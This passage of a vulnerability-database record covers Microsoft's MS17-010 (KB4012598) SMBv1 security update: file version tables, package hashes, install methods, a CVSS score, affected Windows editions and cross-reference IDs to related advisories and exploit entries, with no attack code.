value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H5\">For all supported x86-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:22</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>299,008</td><td>03-Aug-2016</td><td>16:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>274,432</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>258,048</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:40</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>299,008</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>274,432</td><td>11-Feb-2017</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:06</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>258,048</td><td>11-Feb-2017</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:17</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:18</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>103,936</td><td>03-Aug-2016</td><td>14:20</td><td>x86</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>103,936</td><td>11-Feb-2017</td><td>15:18</td><td>x86</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>304,640</td><td>11-Feb-2017</td><td>15:22</td><td>x86</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>305,152</td><td>11-Feb-2017</td><td>15:19</td><td>x86</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>146,432</td><td>03-Aug-2016</td><td>14:20</td><td>x86</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>147,968</td><td>11-Feb-2017</td><td>15:18</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink></body></html>", "published": "2017-03-14T00:25:04", "modified": "2017-03-14T17:40:16", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://support.microsoft.com/en-us/help/4012598/", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0147"], "immutableFields": [], "lastseen": "2019-10-24T22:39:58", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"modified": "2019-10-24T22:39:58", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": 
["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SMNTC-96709"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["CVE-2017-0147"], "type": "cve"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"modified": "2019-10-24T22:39:58", "value": 6.7, "vector": 
"NONE"}}, "objectVersion": "1.5", "kb": "KB4012598", "msrc": "MS17-010", "mscve": "CVE-2017-0147", "msplatform": "", "msfamily": "Windows", "msimpact": "", "msseverity": "", "superseeds": [], "parentseeds": [], "msproducts": ["13230", "14113", "13228", "11721", "14210", "11728", "11740", "11733", "11719", "13236", "13233", "14440", "13234", "11708"], "supportAreaPaths": ["371fbe0b-cb79-c748-a47a-4dc327bf6944", "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "333f3bd9-9578-fda0-5919-4b8fa39524c3", "f62ed778-6986-d76e-c007-40a28315ffbf", "928d79ba-72eb-762f-39be-122173e95922", "fd3a2888-0af1-3691-5303-bc85b4302e62", "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "2b2eeb95-d89c-6614-0db5-88f09133ede6"], "supportAreaPathNodes": [{"id": "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "name": "Windows Server 2008 Datacenter", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "fd3a2888-0af1-3691-5303-bc85b4302e62", "name": "Windows Vista Home Premium", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "name": "Windows Vista Service Pack 2", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "f62ed778-6986-d76e-c007-40a28315ffbf", "name": "Windows Server 2008 Enterprise", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2b2eeb95-d89c-6614-0db5-88f09133ede6", "name": "Windows Server 2008 Foundation", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "name": "Windows Server 2008 for Itanium-Based Systems", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", 
"tree": [], "type": "productversion"}, {"id": "371fbe0b-cb79-c748-a47a-4dc327bf6944", "name": "Windows Vista Business", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "name": "Windows Vista Home Basic", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "928d79ba-72eb-762f-39be-122173e95922", "name": "Windows Vista Starter", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "333f3bd9-9578-fda0-5919-4b8fa39524c3", "name": "Windows Server 2008 Standard", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "name": "Windows Vista Enterprise", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "name": "Windows Vista Ultimate", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "name": "Windows Server 2008 Web Edition", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}], "primarySupportAreaPath": [{"id": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "name": "Windows Server 2008", "parent": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "tree": [], "type": "productname"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "name": "Windows Servers", "tree": [], "type": "productfamily"}]}, "lastseen": "2019-10-24T22:39:58", "differentElements": ["cvelist", "cvss", 
"mscve", "msfamily", "published"], "edition": 2}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "869993357a37829e217b59ee9999c2d2", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important <br/><br/></span><ul class=\"sbody-free_list\"> <li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. 
For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Get security updates automatically</a>. <br/><br/></div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\" http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. <br/></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span></span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><formatting type=\"H3\">File 
hash information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Windows6.0-KB4012598-ia64.msu</td><td>83A6F5A70588B27623B11C42F1C8124A25D489DE</td><td>29B40D7E75186A9CCC9F2F309417E374846F35F41B4D1DE6DBE85F439DC1837F</td></tr><tr><td>Windows6.0-KB4012598-x64.msu</td><td>6A186BA2B2B98B2144B50F88BAF33A5FA53B5D76</td><td>A91A0AF728225FF2A630B9ABA4E639473AA8ABE7CAA23BE10AE48A7887BDE9C8</td></tr><tr><td>Windows6.0-KB4012598-x86.msu</td><td>13E9B3D77BA5599764C296075A796C16A85C745C</td><td>FC7F28A72C117C2A8ECE5916532048C8BF3379C86386348C24319EAC2C6B23C8</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H3\">File information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><boilerplate boilerplatename=\"QFEFileAttributes\" version=\"7\">The English (United States) version of this software update installs files that have the attributes that are listed in the following tables.</boilerplate><formatting type=\"H4\">Windows Vista and Windows Server 2008 file information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><formatting type=\"B\">Notes: </formatting>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.<br/><br/><formatting type=\"H5\">For all supported ia64-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong 
class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>15:36</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,848</td><td>03-Aug-2016</td><td>17:01</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>144,384</td><td>03-Aug-2016</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>137,216</td><td>03-Aug-2016</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>99,840</td><td>03-Aug-2016</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>101,376</td><td>03-Aug-2016</td><td>16:55</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,848</td><td>11-Feb-2017</td><td>17:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>144,384</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>137,216</td><td>11-Feb-2017</td><td>17:14</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>99,840</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>101,376</td><td>11-Feb-2017</td><td>17:23</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:35</td><td>IA-64</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:16</td><td>IA-64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>297,984</td><td>03-Aug-2016</td><td>14:20</td><td>IA-64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>297,984</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>967,168</td><td>11-Feb-2017</td><td>15:31</td><td>IA-64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>969,216</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>468,480</td><td>03-Aug-2016</td><td>14:20</td><td>IA-64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>474,624</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H5\">For all supported x64-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong 
class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>233,984</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>239,104</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>289,792</td><td>03-Aug-2016</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>16:23</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>263,168</td><td>03-Aug-2016</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>229,376</td><td>03-Aug-2016</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,848</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,440</td><td>03-Aug-2016</td><td>17:10</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>144,384</td><td>03-Aug-2016</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>137,216</td><td>03-Aug-2016</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>229,376</td><td>03-Aug-2016</td><td>17:16</td><td>Not 